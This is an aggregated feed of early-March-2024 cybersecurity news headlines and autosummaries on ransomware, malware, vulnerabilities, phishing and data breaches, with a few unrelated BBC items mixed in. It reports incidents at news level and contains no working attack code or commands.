          The post 95% believe LLMs making phishing detection more challenging appeared first on Help Net Security.

          "

          Autosummary: “In the evolving landscape of AI-fueled social engineering attacks, our security practices must be just as adaptable as the threat itself,” said Alex Cox, director of threat intelligence at LastPass. Businesses can more successfully deter social engineering threats by understanding the nuances of prevalent attacks like phishing, baiting, business email compromise, and pretexting and educating employees accordingly. "


          New compensation trends in the cybersecurity sector

          ciber
          2024-03-04 https://www.helpnetsecurity.com/2024/03/04/compensation-trends-cybersecurity-sector/

          For several years, cybersecurity leaders have grappled with talent shortages in crucial cyber roles. In the face of escalating financial requirements and expanding responsibilities, these leaders are under heightened pressure to achieve more with fewer resources, creating roles encompassing multiple security functions. Security roles are often multifunctional A new report illustrates that typical functional combinations within a role include architecture and engineering (A&E), application security (AppSec), and product security. IANS and Artico Search captured responses … More

          The post New compensation trends in the cybersecurity sector appeared first on Help Net Security.

          "

          Autosummary: Gender diversity varies across domains, while the gender pay gap remains prevalent: 20% self-identify as female, binary, or other. "


          Phobos Ransomware Aggressively Targeting U.S. Critical Infrastructure

          exploits ransomware
          2024-03-04 https://thehackernews.com/2024/03/phobos-ransomware-aggressively.html
          U.S. cybersecurity and intelligence agencies have warned of Phobos ransomware attacks targeting government and critical infrastructure entities, outlining the various tactics and techniques the threat actors have adopted to deploy the file-encrypting malware. “Structured as a ransomware as a service (RaaS) model, Phobos ransomware actors have targeted entities including municipal and "

          Autosummary: "Structured as a ransomware as a service (RaaS) model, Phobos ransomware actors have targeted entities including municipal and county governments, emergency services, education, public healthcare, and critical infrastructure to successfully ransom several million in U.S. dollars," the government said. "


          Threat actors hacked Taiwan-based Chunghwa Telecom

          Telcos
          2024-03-04 https://securityaffairs.com/159918/data-breach/chunghwa-telecom-data-breach.html
          Threat actors stole sensitive and confidential data from the telecom giant Chunghwa Telecom Company, revealed the Ministry of National Defense. Chunghwa Telecom Company, Ltd. (literally Chinese Telecom Company) is the largest integrated telecom service provider in Taiwan, and the incumbent local exchange carrier of PSTN, Mobile, and broadband services in the country. Threat actors stole […] "

          Autosummary: "


          New Linux variant of BIFROSE RAT uses deceptive domain strategies

          Linux
          2024-03-04 https://securityaffairs.com/159896/malware/bifrose-bifrost-malware.html
          A new Linux variant of the remote access trojan (RAT) BIFROSE (aka Bifrost) uses a deceptive domain mimicking VMware. Palo Alto Networks Unit 42 researchers discovered a new Linux variant of Bifrost (aka Bifrose) RAT that uses a deceptive domain (download.vmfare[.]com) that mimics the legitimate VMware domain. The Bifrost RAT has been active since 2004, […] "

          Autosummary: A new Linux variant of the remote access trojan (RAT) BIFROSE (aka Bifrost) uses a deceptive domain mimicking VMware. "


          Outrage over Brazilian tourist's gang rape in India

          latam
          2024-03-04 https://www.bbc.co.uk/news/world-asia-india-68444993
          The woman and her husband were on a motorbike tour in India when the alleged assault took place. "

          Autosummary: "


          New GTPDOOR backdoor is designed to target telecom carrier networks

          Telcos
          2024-03-04 https://securityaffairs.com/159929/hacking/gtpdoor-backdoor-telecom-carrier-networks.html
          Researcher HaxRob discovered a previously undetected Linux backdoor named GTPDOOR, designed to target telecom carrier networks. Security researcher HaxRob discovered a previously undetected Linux backdoor dubbed GTPDOOR, which is specifically crafted to carry out stealth cyber operations within mobile carrier networks. The researcher believes that the threat actors behind GTPDOOR focuses on systems proximate to […] "

          Autosummary: “GTPDOOR is a ‘magic/wakeup’ packet backdoor that uses a novel C2 transport protocol: GTP (GPRS Tunnelling Protocol), silently listening on the GRX network,” HaxRob (@haxrob) wrote on February 28, 2024. The researcher believes that the threat actors behind GTPDOOR focus on systems proximate to the GPRS Roaming eXchange (GRX), such as SGSN, GGSN, and P-GW. Both binaries targeted a very old Red Hat Linux version. "


          BlackCat ransomware turns off servers amid claim they stole $22 million ransom

          exploits ransomware
          2024-03-04 https://www.bleepingcomputer.com/news/security/blackcat-ransomware-turns-off-servers-amid-claim-they-stole-22-million-ransom/
          The ALPHV/BlackCat ransomware gang has shut down its servers amid claims that they scammed the affiliate responsible for the attack on Optum, the operator of the Change Healthcare platform, of $22 million. [...] "

Autosummary: Optum allegedly pays ransom. Earlier today, the Tox messaging platform used by the BlackCat ransomware operator contained a message that does not provide any details about what the gang plans next: “Все выключено, решаем,” which translates to "Everything is off, we decide." An alleged ALPHV affiliate claims they were scammed out of the alleged Optum ransom of $22 million (source: Dmitry Smilyanets). Ransomware-as-a-service (RaaS) operations typically work by partnering with external affiliates, who carry out attacks using the operation's encryptors.


          Ukraine claims it hacked Russian Ministry of Defense servers

          rusia-ucrania
          2024-03-04 https://www.bleepingcomputer.com/news/security/ukraine-claims-it-hacked-russian-ministry-of-defense-servers/
The Main Intelligence Directorate (GUR) of Ukraine's Ministry of Defense claims that it breached the servers of the Russian Ministry of Defense (Minoborony) and stole sensitive documents. [...]



          American Express credit cards exposed in third-party data breach

          financial
          2024-03-04 https://www.bleepingcomputer.com/news/security/american-express-credit-cards-exposed-in-third-party-data-breach/
American Express is warning customers that credit cards were exposed in a third-party data breach after a merchant processor was hacked. [...]

Autosummary: "When we learn about a data security incident that impacts our customers, we promptly begin an investigation and notify the appropriate regulatory authorities, as required," American Express told BleepingComputer.


          Critical vulnerabilities in TeamCity JetBrains fixed, release of technical details imminent, patch quickly! (CVE-2024-27198, CVE-2024-27199)

          government
          2024-03-04 https://www.helpnetsecurity.com/2024/03/04/cve-2024-27198-cve-2024-27199/

          JetBrains has fixed two critical security vulnerabilities (CVE-2024-27198, CVE-2024-27199) affecting TeamCity On-Premises and is urging customers to patch them immediately. “Rapid7 originally identified and reported these vulnerabilities to us and has chosen to adhere strictly to its own vulnerability disclosure policy. This means that their team will publish full technical details of these vulnerabilities and their replication steps within 24 hours of this notice,” the company stated today. This also means that proof-of-concept and full … More

          The post Critical vulnerabilities in TeamCity JetBrains fixed, release of technical details imminent, patch quickly! (CVE-2024-27198, CVE-2024-27199) appeared first on Help Net Security.



How Cybercriminals are Exploiting India's UPI for Money Laundering Operations

          financial exploits ciber
          2024-03-04 https://thehackernews.com/2024/03/how-cybercriminals-are-exploiting.html
Cybercriminals are using a network of hired money mules in India using an Android-based application to orchestrate a massive money laundering scheme. The malicious application, called XHelper, is a "key tool for onboarding and managing these money mules," CloudSEK researchers Sparsh Kulshrestha, Abhishek Mathew, and Santripti Bhujel said in a report. Details about the scam



          Hackers steal Windows NTLM authentication hashes in phishing attacks

          financial
          2024-03-04 https://www.bleepingcomputer.com/news/security/hackers-steal-windows-ntlm-authentication-hashes-in-phishing-attacks/
The hacking group known as TA577 has recently shifted tactics by using phishing emails to steal NT LAN Manager (NTLM) authentication hashes to perform account hijacks. [...]

Autosummary: The stolen hashes can, under certain circumstances and depending on the security measures in place, enable attackers to escalate their privileges, hijack accounts, access sensitive information, evade security products, and move laterally within a breached network.


          Some American Express customers’ data exposed in a third-party data breach

          financial
          2024-03-04 https://securityaffairs.com/159964/data-breach/american-express-customers-data-exposed.html
American Express warns customers that their credit cards were exposed due to a data breach experienced by a third-party merchant processor. American Express (Amex) notifies customers that their credit card information has been compromised in a data breach involving a third-party merchant processor. The company did not disclose the number of impacted customers. “We became […]



          Exploit available for new critical TeamCity auth bypass bug, patch now

          exploits government
          2024-03-04 https://www.bleepingcomputer.com/news/security/exploit-available-for-new-critical-teamcity-auth-bypass-bug-patch-now/
A critical vulnerability (CVE-2024-27198) in the TeamCity On-Premises CI/CD solution from JetBrains can let a remote unauthenticated attacker take control of the server with administrative permissions. [...]

Autosummary: CVE-2024-27198 (critical, 9.8 severity) is an authentication bypass vulnerability in the web component of TeamCity caused by an alternative path issue. CVE-2024-27199 (high, 7.3 severity) is a path traversal vulnerability in the web component of TeamCity that allows bypassing authentication. The researchers warn that CVE-2024-27198 can give an attacker complete control over a vulnerable TeamCity On-Premises server, including remote code execution.


          ScreenConnect flaws exploited to drop new ToddleShark malware

          exploits
          2024-03-04 https://www.bleepingcomputer.com/news/security/screenconnect-flaws-exploited-to-drop-new-toddleshark-malware/
The North Korean APT hacking group Kimsuky is exploiting ScreenConnect flaws, particularly CVE-2024-1708 and CVE-2024-1709, to infect targets with a new malware variant dubbed ToddleShark. [...]

Autosummary: ToddleShark routinely gathers system information from infected devices, including the hostname, system configuration details, user accounts, active user sessions, network configurations, installed security software, all current network connections, an enumeration of running processes, and a list of installed software compiled by parsing common installation paths and the Windows Start Menu (sixteen cmd.exe instances were used for data theft, per Kroll). Finally, ToddleShark encodes the gathered information in Privacy Enhanced Mail (PEM) certificates, exfiltrated to the attacker's command and control (C2) infrastructure, an advanced and known Kimsuky tactic.


          ScreenConnect flaws exploited to drop new ToddlerShark malware

          exploits
          2024-03-04 https://www.bleepingcomputer.com/news/security/screenconnect-flaws-exploited-to-drop-new-toddlershark-malware/
The North Korean APT hacking group Kimsuky is exploiting ScreenConnect flaws, particularly CVE-2024-1708 and CVE-2024-1709, to infect targets with a new malware variant dubbed ToddlerShark. [...]

Autosummary: ToddlerShark routinely gathers system information from infected devices, including the hostname, system configuration details, user accounts, active user sessions, network configurations, installed security software, all current network connections, an enumeration of running processes, and a list of installed software compiled by parsing common installation paths and the Windows Start Menu (sixteen cmd.exe instances were used for data theft, per Kroll). Finally, ToddlerShark encodes the gathered information in Privacy Enhanced Mail (PEM) certificates, exfiltrated to the attacker's command and control (C2) infrastructure, an advanced and known Kimsuky tactic.


          Week in review: LockBit leak site is back online, NIST updates its Cybersecurity Framework

          ransomware ciber
          2024-03-03 https://www.helpnetsecurity.com/2024/03/03/week-in-review-lockbit-leak-site-is-back-online-nist-updates-its-cybersecurity-framework/

          Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Overcoming the pressures of cybersecurity startup leadership In this Help Net Security interview, Kunal Agarwal, CEO at Dope Security, offers a look into the CEO’s leadership philosophy, the process of building a high-caliber team, and the unique challenges of navigating a startup in the tech industry. AI-driven DevOps: Revolutionizing software engineering practices In this Help Net Security interview, Itamar Friedman, … More

          The post Week in review: LockBit leak site is back online, NIST updates its Cybersecurity Framework appeared first on Help Net Security.


Autosummary: Infosec products of the month: February 2024. Here’s a look at the most interesting products from the past month, featuring releases from Appdome, BackBox, Center for Internet Security, Cisco, CompliancePro Solutions, Cyberhaven, LOKKER, ManageEngine, Metomic, OPSWAT, Pindrop, ProcessUnity, Qualys, SentinelOne, Sumsub, Truffle Security, Vade Secure, and Varonis.


          Stealthy GTPDOOR Linux malware targets mobile operator networks

          exploits Linux
          2024-03-03 https://www.bleepingcomputer.com/news/security/stealthy-gtpdoor-linux-malware-targets-mobile-operator-networks/
Security researcher HaxRob discovered a previously unknown Linux backdoor named GTPDOOR, designed for covert operations within mobile carrier networks. [...]

Autosummary: GTPDOOR v1 supports the following operations on breached hosts: setting a new encryption key used for C2 communications, writing arbitrary data to a local file named "system.conf", and executing arbitrary shell commands and sending back the output. GTPDOOR v2 supports the above operations and additionally lets the operator specify IP addresses or subnets allowed to communicate with the compromised host through an Access Control List (ACL) mechanism.


Chile's Niemann wins LIV Jeddah in Saudi Arabia

          latam
          2024-03-03 https://www.bbc.co.uk/sport/golf/68462910
Chile's Joaquin Niemann claims his second victory of the season on the LIV Golf Tour, winning in Jeddah by four shots.



          US cyber and law enforcement agencies warn of Phobos ransomware attacks

          exploits ransomware
          2024-03-02 https://securityaffairs.com/159822/cyber-crime/cisa-phobos-ransomware-attacks.html
US CISA, the FBI, and MS-ISAC issued a joint cybersecurity advisory (CSA) to warn of attacks involving Phobos ransomware variants, such as Backmydata, Devos, Eight, Elking, and Faust, observed as recently as February 2024. The attacks […]

Autosummary: Pierluigi Paganini, March 02, 2024. US CISA, the FBI, and MS-ISAC issued a joint cybersecurity advisory (CSA) to warn of attacks involving Phobos ransomware variants such as Backmydata, Devos, Eight, Elking, and Faust, observed as recently as February 2024.


          Hackers target FCC, crypto firms in advanced Okta phishing attacks

          financial
          2024-03-02 https://www.bleepingcomputer.com/news/security/hackers-target-fcc-crypto-firms-in-advanced-okta-phishing-attacks/
A new phishing kit named CryptoChameleon is being used to target Federal Communications Commission (FCC) employees, using specially crafted single sign-on (SSO) pages for Okta that appear remarkably similar to the originals. [...]

Autosummary: The same campaign also targets users and employees of cryptocurrency platforms, such as Binance, Coinbase, Kraken, and Gemini, using phishing pages that impersonate Okta, Gmail, iCloud, Outlook, Twitter, Yahoo, and AOL.


          Windows Kernel bug fixed last month exploited as zero-day since August

          exploits Linux
          2024-03-02 https://www.bleepingcomputer.com/news/security/windows-kernel-bug-fixed-last-month-exploited-as-zero-day-since-august/
Microsoft patched a high-severity Windows Kernel privilege escalation vulnerability in February, six months after being informed that the flaw was being exploited as a zero-day. [...]

Autosummary: "With kernel-level access, an attacker might disrupt security software, conceal indicators of infection (including files, network activity, processes, etc.), disable kernel-mode telemetry, turn off mitigations, and more," Avast explained.


          Businesses foresee major impact from new SEC cybersecurity disclosure rules

          ciber
          2024-03-01 https://www.helpnetsecurity.com/2024/03/01/sec-cybersecurity-disclosure-impact-on-business/

          While 98% of security professionals and executives have started working to comply with the new U.S. Securities and Exchange Commission (SEC) cybersecurity disclosure ruling, over one-third are still in the early phases of their efforts, according to AuditBoard. 81% of respondents say the new SEC cybersecurity disclosure ruling will substantially impact their business. 54% of those, however, report being highly confident in their organization’s ability to comply with the disclosure ruling. Companies prepare for SEC … More

          The post Businesses foresee major impact from new SEC cybersecurity disclosure rules appeared first on Help Net Security.


Autosummary: Companies prepare for SEC cybersecurity rules implementation. The SEC’s new cybersecurity rules on Cybersecurity Risk Management, Strategy, Governance, and Incident Disclosure took effect on Dec. 15, 2023.


          Cybercriminals harness AI for new era of malware development

          exploits ciber
          2024-03-01 https://www.helpnetsecurity.com/2024/03/01/hi-tech-crime-trends-2023-2024/

The alliance between ransomware groups and initial access brokers (IABs) is still the powerful engine of the cybercriminal industry, as evidenced by the 74% year-on-year increase in the number of companies that had their data uploaded on dedicated leak sites (DLS), according to Group-IB’s Hi-Tech Crime Trends 2023/2024 report. Global threat actors also demonstrated increased interest in Apple platforms, exemplified by the fivefold increase in underground sales related to macOS information stealers. The growing appetite of … More

          The post Cybercriminals harness AI for new era of malware development appeared first on Help Net Security.


Autosummary: Financial services (6%), telecommunications (5%), manufacturing, IT and media (all 4%) were also heavily affected, Group-IB researchers found. In terms of affected industries, attacks as per ransomware DLS on manufacturing (580 instances) and real estate (429) companies rose year-on-year by 125% and 165%, respectively, and these key sectors were the two most targeted worldwide. Group-IB experts have also noticed how, since mid-2023, four ChatGPT-style tools have been developed for the purpose of assisting cybercriminal activity: WolfGPT, DarkBARD, FraudGPT, and WormGPT – all with different functionalities.


          Five Eyes Agencies Warn of Active Exploitation of Ivanti Gateway Vulnerabilities

          exploits
          2024-03-01 https://thehackernews.com/2024/03/five-eyes-agencies-warn-of-active.html
The Five Eyes (FVEY) intelligence alliance has issued a new cybersecurity advisory warning of cyber threat actors exploiting known security flaws in Ivanti Connect Secure and Ivanti Policy Secure gateways, noting that the Integrity Checker Tool (ICT) can be deceived to provide a false sense of security. "Ivanti ICT is not sufficient to detect compromise and that a cyber threat actor may be able



          CISA adds Microsoft Streaming Service bug to its Known Exploited Vulnerabilities catalog

          exploits
          2024-03-01 https://securityaffairs.com/159796/security/cisa-adds-microsoft-streaming-service-bug-known-exploited-vulnerabilities-catalog.html
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds a Microsoft Streaming Service vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the CVE-2023-29360 (CVSS Score 8.4) Microsoft Streaming Service Untrusted pointer dereference vulnerability to its Known Exploited Vulnerabilities (KEV) catalog. An attacker can exploit this vulnerability to gain SYSTEM privileges. […]



          New Phishing Kit Leverages SMS, Voice Calls to Target Cryptocurrency Users

          financial
          2024-03-01 https://thehackernews.com/2024/03/new-phishing-kit-leverages-sms-voice.html
A novel phishing kit has been observed impersonating the login pages of well-known cryptocurrency services as part of an attack cluster designed to primarily target mobile devices. “This kit enables attackers to build carbon copies of single sign-on (SSO) pages, then use a combination of email, SMS, and voice phishing to trick the target into sharing usernames, passwords, password reset URLs,

Autosummary: "This kit enables attackers to build carbon copies of single sign-on (SSO) pages, then use a combination of email, SMS, and voice phishing to trick the target into sharing usernames, passwords, password reset URLs, and even photo IDs from hundreds of victims, mostly in the United States," Lookout said in a report.


          New BIFROSE Linux Malware Variant Using Deceptive VMware Domain for Evasion

          exploits Linux
          2024-03-01 https://thehackernews.com/2024/03/new-bifrose-linux-malware-variant-using.html
Cybersecurity researchers have discovered a new Linux variant of a remote access trojan (RAT) called BIFROSE (aka Bifrost) that uses a deceptive domain mimicking VMware. "This latest version of Bifrost aims to bypass security measures and compromise targeted systems," Palo Alto Networks Unit 42 researchers Anmol Maurya and Siddharth Sharma said. BIFROSE is one of the long-standing

Autosummary: The malware has been put to use by a state-backed hacking group from China tracked as BlackTech (aka Circuit Panda, HUAPI, Manga Taurus, Palmerworm, PLEAD, Red Djinn, and Temp.


          Germany takes down largest cybercrime market in the country, arrests 6

          government
          2024-03-01 https://www.bleepingcomputer.com/news/legal/germany-takes-down-largest-cybercrime-market-in-the-country-arrests-6/
The Düsseldorf Police in Germany have seized Crimemarket, the largest German-speaking illicit trading platform on the internet, arresting six people, including one of its operators. [...]

Autosummary: Based on the above and the seizure banner, it appears the police opted to allow cybercriminals to continue using the platform post-confiscation (or compromise) to gather identification data, login credentials, and other incriminating information.


          Pig butchering scams, how they work and how to avoid them

          financial
          2024-03-01 https://www.malwarebytes.com/blog/news/2024/03/pig-butchering-scams-how-they-work-and-how-to-avoid-them
Pig butchering scams are usually tied to cryptocurrency investments that make for big business with victims on both sides of the line.

Autosummary: (Note that you’ll need to be in the USA to watch it, or have a good VPN 😉.) As John Oliver put it: “You may have an image of a person who might fall for pig butchering, but unless you are looking in a mirror, you might be wrong.” As you can see, there is a very specific goal in mind for the pig butcher scammers, and if you find yourself drawn down this path, the alarm bells should be ringing by step 4 or 5.


          Five Eyes alliance warns of attacks exploiting known Ivanti Gateway flaws

          exploits
          2024-03-01 https://securityaffairs.com/159807/hacking/fiveeye-warns-ivanti-gateways-attacks.html
The Five Eyes alliance warns of threat actors exploiting known security flaws in Ivanti Connect Secure and Ivanti Policy Secure gateways. The Five Eyes intelligence alliance issued a joint cybersecurity advisory warning of threat actors exploiting known vulnerabilities in Ivanti Connect Secure and Ivanti Policy Secure gateways. The advisory provides details about the exploitation in […]

Autosummary: The software firm also addressed the following two additional high-severity vulnerabilities: CVE-2024-21888 (CVSS score: 8.8), a privilege escalation vulnerability in the web component, and CVE-2024-22024 (CVSS score: 8.3), an XXE vulnerability in the SAML component. “The authoring organizations encourage network defenders to (1) assume that user and service account credentials stored within the affected Ivanti VPN appliances are likely compromised, (2) hunt for malicious activity on their networks using the detection methods and indicators of compromise (IOCs) within this advisory, (3) run Ivanti’s most recent external ICT, and (4) apply available patching guidance provided by Ivanti as version updates become available,” the advisory continues.


          How big banks are becoming "Bitcoin whales"

          financial
          2024-03-01 https://www.bbc.co.uk/news/technology-68434579
There will only ever be 21 million bitcoins, and US financial giants are buying up thousands.



          The Week in Ransomware - March 1st 2024 - Healthcare under siege

          exploits ransomware
          2024-03-01 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-march-1st-2024-healthcare-under-siege/
Ransomware attacks on healthcare over the last few months have been relentless, with numerous ransomware operations targeting hospitals and medical services, causing disruption to patient care and access to prescription drugs in the USA. [...]

Autosummary: Contributors and those who provided new ransomware information and stories this week include: @demonslay335, @Ionut_Ilascu, @Seifreed, @serghei, @fwosar, @BleepinComputer, @malwrhunterteam, @billtoulas, @LawrenceAbrams, @Threatlabz, @DarkWebInformer, @CISAgov, @TrendMicro, @Shadowserver, @a_greenberg, @BrettCallow, @Jon__DiMaggio, @CrowdStrike, @H4ckManac, @RobWright22, @ValeryMarchive, and @pcrisk. February 25th 2024: The LockBit gang is relaunching its ransomware operation on a new infrastructure less than a week after law enforcement hacked their servers, and is threatening to focus more of their attacks on the government sector. These incidents targeted municipal and county governments, emergency services, education, public healthcare, and other critical infrastructure entities to successfully ransom several million U.S. dollars. This week, the notorious ransomware gang known as LockBit threatened a kind of disruption that would have been a first even for a criminal industry that has crippled hospitals and triggered the shutdown of a gas pipeline: leaking documents from the criminal prosecution of a former president and presidential candidate. February 29th 2024: The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate known TTPs and IOCs associated with the Phobos ransomware variants observed as recently as February 2024, according to open source reporting.


          CISA warns of Microsoft Streaming bug exploited in malware attacks

          exploits
          2024-03-01 https://www.bleepingcomputer.com/news/security/cisa-warns-of-microsoft-streaming-bug-exploited-in-malware-attacks/
CISA ordered U.S. Federal Civilian Executive Branch (FCEB) agencies to secure their Windows systems against a high-severity vulnerability in the Microsoft Streaming Service (MSKSSRV.SYS) that's actively exploited in attacks. [...]

Autosummary: Exploited in malware attacks since August. American-Israeli cybersecurity company Check Point provided more information on this vulnerability last month, saying that Raspberry Robin malware attacks have been exploiting CVE-2023-29360 since August 2023.


          PikaBot malware on the rise: What organizations need to know

          exploits
          2024-03-01 https://www.malwarebytes.com/blog/business/2024/03/pikabot-malware-on-the-rise-what-organizations-need-to-know
Ransomware gangs are using a powerful new trojan named PikaBot.

Autosummary: Before it was shut down, for example, Qbot allowed ransomware gangs to seamlessly integrate various attack techniques into their operations, including stealing credentials, moving laterally across networks, and ultimately deploying ransomware or other malicious payloads. After Qbot got shut down, there was a vacuum in the ransomware gang tool box—but with PikaBot, that’s beginning to change: last month we wrote about the first recorded instance of PikaBot being used by ransomware gangs, specifically Black Basta, in their attacks.


          Smashing Security podcast #361: Wireless charging woe, AI romance apps, and ransomware revisited

          exploits ransomware
          2024-02-29 https://grahamcluley.com/smashing-security-podcast-361/
Your smartphone may be toast – if you use a hacked wireless charger, we take a closer look at the latest developments in the unfolding LockBit ransomware drama, and Carole dips her toe into online AI romance apps. All this and much much more is discussed in the latest edition of the “Smashing Security” podcast …

Autosummary: Hosts: Graham Cluley – @gcluley, Carole Theriault – @caroletheriault. Guest: Paul Ducklin – @duckblog. Sponsored by BlackBerry – BlackBerry helps keep you one step ahead.


          Vishing, smishing, and phishing attacks skyrocket 1,265% post-ChatGPT

          financial
          2024-02-29 https://www.helpnetsecurity.com/2024/02/29/mobile-fraud-losses/

76% of enterprises lack sufficient voice and messaging fraud protection as AI-powered vishing and smishing skyrocket following the launch of ChatGPT, according to Enea. Enterprises report significant losses from mobile fraud: 61% of enterprises still suffer significant losses to mobile fraud, with smishing (SMS phishing) and vishing (voice phishing) being the most prevalent and costly. Enterprises account for a significant share of communication service provider (CSP) subscribers and an even greater share of their revenues. … More

          The post Vishing, smishing, and phishing attacks skyrocket 1,265% post-ChatGPT appeared first on Help Net Security.


Autosummary: CSPs that prioritize security are better positioned to win enterprise business. Security leaders, characterized by better capabilities, better funding, and a higher prioritization of security, are less than half as likely as the followers to have a security breach go undetected or unmitigated (12% vs 25%).


          Lazarus Exploits Typos to Sneak PyPI Malware into Dev Systems

          exploits
          2024-02-29 https://thehackernews.com/2024/02/lazarus-exploits-typos-to-sneak-pypi.html
The notorious North Korean state-backed hacking group Lazarus uploaded four packages to the Python Package Index (PyPI) repository with the goal of infecting developer systems with malware. The packages, now taken down, are pycryptoenv, pycryptoconf, quasarlib, and swapmempool. They have been collectively downloaded 3,269 times, with pycryptoconf accounting for the most



          Chinese Hackers Exploiting Ivanti VPN Flaws to Deploy New Malware

          exploits
          2024-02-29 https://thehackernews.com/2024/02/chinese-hackers-exploiting-ivanti-vpn.html
At least two different suspected China-linked cyber espionage clusters, tracked as UNC5325 and UNC3886, have been attributed to the exploitation of security flaws in Ivanti Connect Secure VPN appliances. UNC5325 abused CVE-2024-21893 to deliver a wide range of new malware called LITTLELAMB.WOOLTEA, PITSTOP, PITDOG, PITJET, and PITHOOK, as well as attempted to maintain

Autosummary: UNC5325 abused CVE-2024-21893 to deliver a wide range of new malware called LITTLELAMB.WOOLTEA, PITSTOP, PITDOG, PITJET, and PITHOOK, as well as attempted to maintain persistent access to compromised appliances, Mandiant said.


          Is the LockBit gang resuming its operation?

          ransomware
          2024-02-29 https://securityaffairs.com/159757/cyber-crime/lockbit-gang-resuming-operation.html
Experts warn that the LockBit ransomware group has started using updated encryptors in new attacks, after the recent law enforcement operation. The LockBit ransomware group appears to have fully recovered its operations following the recent law enforcement initiative, code-named Operation Cronos, which aimed to disrupt its activities. Researchers from Zscaler first observed the ransomware group […]

Autosummary: Pierluigi Paganini, February 29, 2024. Experts warn that the LockBit ransomware group has started using updated encryptors in new attacks, after the recent law enforcement operation.


          Lazarus APT exploited zero-day in Windows driver to gain kernel privileges

          exploits Linux
          2024-02-29 https://securityaffairs.com/159728/apt/lazarus-exploited-zero-day-windows-applocker-driver.html
North Korea-linked Lazarus APT exploited a zero-day flaw in the Windows AppLocker driver (appid.sys) to gain kernel-level access to target systems. Avast researchers observed the North Korea-linked Lazarus APT group using an admin-to-kernel exploit for a zero-day vulnerability in the appid.sys AppLocker driver. The zero-day, tracked as CVE-2024-21338, has been addressed by Microsoft in the February […]

Autosummary: Pierluigi Paganini, February 29, 2024. North Korea-linked Lazarus APT exploited a zero-day flaw in the Windows AppLocker driver (appid.sys) to gain kernel-level access to target systems.


          Facebook bug could have allowed attacker to take over accounts

          exploits
          2024-02-29 https://www.malwarebytes.com/blog/news/2024/02/facebook-bug-could-have-allowed-attacker-to-take-over-accounts
A vulnerability, now fixed, in Facebook could have allowed an attacker to take over a Facebook account without the victim needing to click on anything at all.

Autosummary: After investigation, a few characteristics of the login code made it an interesting attack vector: the code was valid for two hours; it did not change during that period when requesting it; and there was no validation if you attempted a wrong login code. Combined with the fact that these codes are only 6 digits, Samip saw opportunities for a brute force attack, where an attacker repeatedly tries to access login credentials in the hope of eventually getting into an account. After uncovering all this information, and with his extensive knowledge about the Facebook authentication process, Samip found the method to take over an account was relatively simple: Pick any Facebook account.


          ALPHV/BlackCat threatens to leak data stolen in Change Healthcare cyberattack

          ciber
          2024-02-29 https://www.helpnetsecurity.com/2024/02/29/alphv-blackcat-change-healthcare/

          The ALPHV/BlackCat ransomware group has claimed responsibility for the cyberattack that targeted Optum, a subsidiary of UnitedHealth Group (UHG), causing disruption to the Change Healthcare platform and affecting pharmacy transactions across the US. ALPHV/BlackCat is back Last December, US law enforcement successfully shut down the ransomware group’s websites, and the FBI developed a decryption tool. Despite this setback, the group quickly recovered and resumed its activities. On Wednesday, the group published a statement on their … More

          The post ALPHV/BlackCat threatens to leak data stolen in Change Healthcare cyberattack appeared first on Help Net Security.




          Kali Linux 2024.1 released: New tools, new look, new Kali Nethunter kernels

          Linux
          2024-02-29 https://www.helpnetsecurity.com/2024/02/29/kali-linux-2024-1-released-new-tools-new-look-kali-nethunter-kernels/

          OffSec has released Kali Linux 2024.1, the latest version of its popular penetration testing and digital forensics platform. The new version comes with new tools, a fresh look (themes, wallpapers and icons for Kali and Kali Purple), a new image viewer for the Gnome desktop and a usability enhancement to the Xfce desktop (the ability to copy one’s VPN IP address to the clipboard with just a click), and updates for the Kali NetHunter mobile … More

          The post Kali Linux 2024.1 released: New tools, new look, new Kali Nethunter kernels appeared first on Help Net Security.




          GTPDOOR Linux Malware Targets Telecoms, Exploiting GPRS Roaming Networks

          exploits Telcos Linux
          2024-02-29 https://thehackernews.com/2024/02/gtpdoor-linux-malware-targets-telecoms.html
Threat hunters have discovered a new Linux malware called GTPDOOR that’s designed to be deployed in telecom networks that are adjacent to GPRS roaming exchanges (GRX). The malware is novel in that it leverages the GPRS Tunnelling Protocol (GTP) for command-and-control (C2) communications. GPRS roaming allows subscribers to access their GPRS services while they are



          How to Prioritize Cybersecurity Spending: A Risk-Based Strategy for the Highest ROI

          ciber
          2024-02-29 https://thehackernews.com/2024/02/why-risk-based-approach-to.html
As an IT leader, staying on top of the latest cybersecurity developments is essential to keeping your organization safe. But with threats coming from all around — and hackers dreaming up new exploits every day — how do you create proactive, agile cybersecurity strategies? And what cybersecurity approach gives you the most bang for your buck, mitigating your risks and maximizing the value of your

Autosummary: Let's take a closer look at the trends that are impacting organizations today, including the growing reach of data breaches and the increase in cybersecurity spending, and explore how you can get the most out of your cybersecurity resources, effectively securing your digital assets and maintaining your organization's integrity in the face of ever-evolving cyber threats. And data breaches can cause real, long-lasting impacts, as proven by some of the most infamous data breaches in history: eBay: Hackers stole login credentials for just a few eBay employees and then pulled off a massive data breach that stole the personal information and passwords of more than 145 million users.


          Lazarus Hackers Exploited Windows Kernel Flaw as Zero-Day in Recent Attacks

          exploits Linux
          2024-02-29 https://thehackernews.com/2024/02/lazarus-hackers-exploited-windows.html
The notorious Lazarus Group actors exploited a recently patched privilege escalation flaw in the Windows Kernel as a zero-day to obtain kernel-level access and disable security software on compromised hosts. The vulnerability in question is CVE-2024-21338 (CVSS score: 7.8), which can permit an attacker to gain SYSTEM privileges. It was resolved by Microsoft earlier this month as part

Autosummary: Cybersecurity vendor Avast, which discovered an in-the-wild admin-to-kernel exploit for the bug, said the kernel read/write primitive achieved by weaponizing the flaw allowed the Lazarus Group to "perform direct kernel object manipulation in an updated version of their data-only FudModule rootkit."


          20 million Cutout.Pro user records leaked on data breach forum

          financial
          2024-02-29 https://www.bleepingcomputer.com/news/security/20-million-cutoutpro-user-records-leaked-on-data-breach-forum/
AI service Cutout.Pro has suffered a data breach exposing the personal information of 20 million members, including email addresses, hashed and salted passwords, IP addresses, and names. [...]

Autosummary: The leaked fields include: API access key, account creation date, email address, user IP address, mobile phone number, password and salt used in hashing, user type and account status. Data breach monitoring and alerting service Have I Been Pwned (HIBP) added the breach to its catalog yesterday, confirming that the leaked dataset includes the information for 19,972,829 people.


